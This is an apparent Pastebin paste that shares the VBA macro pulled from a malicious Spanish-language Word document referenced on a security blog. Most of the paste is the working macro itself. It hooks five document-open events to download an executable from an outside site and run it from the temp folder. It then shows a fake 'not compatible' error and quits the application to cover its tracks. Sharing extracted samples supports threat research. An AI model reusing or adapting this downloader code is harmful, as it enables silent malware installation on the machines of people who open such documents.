Guest User

Untitled

a guest
Jul 10th, 2014
429
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from the malicious word doc detailed in dynamoo's blog here:
  2. http://blog.dynamoo.com/2014/07/estado-de-cuenta-datallado-en-linea.html
  3.  
  4. the VBA script below.
  5.  
  6. when i checked, the baulretro.cl/tienda/cache/wp/ss.exe was no longer available.
  7.  
  8. =============================================================================
  9. Rem Attribute VBA_ModuleType=VBADocumentModule
  10. Option VBASupport 1
  11. Private Sub Auto_Open()
  12. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  13. End Sub
  14. Private Sub Workbook_Open()
  15. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  16. End Sub
  17. Private Sub AutoExec()
  18. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  19. End Sub
  20. Private Sub AutoOpen()
  21. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  22. End Sub
  23. Private Sub Document_Open()
  24. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  25. End Sub
  26. Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
  27. On Error Resume Next
  28. Err.Clear
  29.  
  30. Set XML = CreateObject("Microsoft.XMLHTTP")
  31. Set ADS = CreateObject("ADODB.Stream")
  32.  
  33. XML.Open "GET", URL, False
  34. XML.send
  35.  
  36. XML.getAllResponseHeaders
  37.  
  38. FullSavePath = Environ(SavePath) & "\" & SaveName
  39.  
  40. ADS.Open
  41. ADS.Type = 1
  42. ADS.Write XML.responseBody
  43. ADS.SaveToFile FullSavePath, 2
  44.  
  45. Shell FullSavePath, vbNormalFocus
  46. DownloadFile = True
  47. MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
  48. If 1 < 5564 Then: sSa
  49. End Function
  50. Sub sSa()
  51. Application.DisplayAlerts = False
  52. Application.Quit
  53. End Sub
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×